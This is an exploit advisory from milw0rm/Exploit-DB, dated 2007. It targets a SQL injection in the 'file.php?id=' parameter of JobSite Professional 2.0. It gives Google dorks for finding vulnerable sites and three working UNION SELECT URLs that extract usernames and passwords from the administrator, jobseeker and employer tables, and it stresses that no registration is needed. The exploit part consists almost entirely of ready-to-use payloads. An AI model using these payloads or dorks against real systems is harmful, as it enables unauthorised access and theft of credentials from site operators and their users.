JobSite Professional 2.0 - 'file.php' SQL Injection

EDB-ID:

4576


Author:

ZynbER

Type:

webapps


Platform:

PHP

Date:

2007-10-28


#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version  : inurl:index.php?page=fr_Candidats


## EXPLOITS :

Vulnerability in (File.php?id=)



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!



## GREETZ  :  MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-10-28]